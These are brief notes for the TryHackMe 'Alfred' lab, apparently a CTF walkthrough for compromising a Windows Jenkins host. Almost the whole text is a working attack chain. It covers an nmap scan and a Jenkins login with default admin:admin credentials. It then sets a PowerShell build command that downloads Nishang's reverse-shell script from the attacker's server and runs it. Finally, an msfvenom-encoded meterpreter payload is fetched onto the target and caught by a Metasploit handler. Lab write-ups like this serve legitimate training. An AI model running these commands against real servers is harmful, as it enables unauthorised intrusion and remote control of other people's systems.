THM - Alfred
Nmap
nmap -p- -A 10.10.75.158 -o alfred.nmap
Jenkins
http://10.10.75.158:8080
admin:admin
Get initial access
Get payload
https://github.com/samratashok/nishang
Revers shell
On hacker machine
listener
nc -nvlp 4443
static web server
python3 -m http.server
On target machine
powershell iex (New-Object Net.WebClient).DownloadString('http://10.18.9.175:8000/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.18.9.175 -Port 4443
- Add this script as
Command
in Project configuration for Jenkins
Switching Shells
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.18.9.175 LPORT=4442 -f exe -o msf_shell.exe
powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.18.9.175:8000/msf_shell.exe','msf_shell.exe')"
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.18.9.175
set LPORT 4442
run
Start-Process "msf_shell.exe"